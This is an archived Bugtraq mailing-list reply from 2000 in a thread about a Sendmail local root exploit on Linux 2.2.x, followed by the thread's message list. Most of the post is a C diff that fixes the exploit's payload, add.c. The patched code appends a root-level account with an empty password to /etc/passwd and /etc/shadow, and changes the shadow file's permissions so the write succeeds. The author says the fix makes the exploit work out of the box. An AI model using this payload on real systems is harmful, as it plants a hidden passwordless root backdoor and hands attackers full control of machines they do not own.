Bugtraq mailing list archives
Re: Sendmail local root exploit on linux 2.2.x
From: pettit () YAHOO-INC COM (Mark K. Pettit)
Date: Thu, 8 Jun 2000 12:18:44 -0700
Hello all, Attached is a file with 2 sources, ex.c and add.c
This is a great exploit. It is a little broken, though. Here's a patched version of the add.c script so that it is a little kinder and works out of the box the first time. The problem has to do with the permissions on the shadow file. If it's installed with mode 400, the exploit will fail. There's also a \n left out of the shadow line. This patch fixes both of these problems. Yah, I know it's trivial, but I wanted to be complete. ============================================================================ --- add.c.orig Thu Jun 8 11:32:33 2000 +++ add.c Thu Jun 8 11:21:15 2000 @@ -1,17 +1,24 @@ #include <fcntl.h> +#include <sys/types.h> +#include <sys/stat.h> +#include <unistd.h> int main (void) { int fd; char string[40]; + struct stat buf; seteuid(0); fd = open("/etc/passwd", O_APPEND|O_WRONLY); strcpy(string, "yomama:x:0:0::/root:/bin/sh\n"); write(fd, string, strlen(string)); close(fd); + stat("/etc/shadow", &buf); + chmod("/etc/shadow", S_IRUSR|S_IWUSR); fd = open("/etc/shadow", O_APPEND|O_WRONLY); - strcpy(string, "yomama::11029:0:99999:7:::"); + strcpy(string, "yomama::11029:0:99999:7:::\n"); write(fd, string, strlen(string)); close(fd); - + chmod("/etc/shadow", buf.st_mode); } ============================================================================ -- Mark K. Pettit, CCNA Do you, uh, Yahoo!? pettit () yahoo-inc com Why, yes, I do, uh, Yahoo! Technical Yahoo Yahoo!, Inc., 3420 Central Expressway, Santa Clara, CA 95051
Current thread:
- Sendmail local root exploit on linux 2.2.x Florian Heinz (Jun 08)
- Snort 1.6 and nmap 2.54beta1 Galileo (May 12)
- Re: Snort 1.6 and nmap 2.54beta1 Simple Nomad (Jun 14)
- Security Advisory: REMOTE ROOT VULNERABILITY IN GSSFTP DAEMON Tom Yu (Jun 14)
- Security Advisory: local ROOT exploit in BRU Technical Support (Jun 14)
- Re: Snort 1.6 and nmap 2.54beta1 Martin Roesch (Jun 14)
- Re: Sendmail local root exploit on linux 2.2.x Mark K. Pettit (Jun 08)
- Reporting Security Issues to Microsoft Microsoft Security Response Center (Jun 08)
- Re: Sendmail local root exploit on linux 2.2.x Christophe GRENIER (Jun 08)
- arprelay: a tool to edit TCP connections in a LAN Felix von Leitner (Jun 09)
- Re: Sendmail local root exploit on linux 2.2.x Alan Iwi (Jun 12)
- Splitvt exploit syzop (Jun 14)
- Re: Splitvt exploit Joey Hess (Jun 14)
- Re: Splitvt exploit Andrey Savochkin (Jun 16)
- Re: Splitvt exploit Joey Hess (Jun 16)
- NAI WebShield SMTP does not scan base64 encoding chris.paget () ANALYSYS COM (Jun 20)
- Re: Splitvt exploit Joey Hess (Jun 14)
- Re: Splitvt exploit Kris Kennaway (Jun 15)
- Snort 1.6 and nmap 2.54beta1 Galileo (May 12)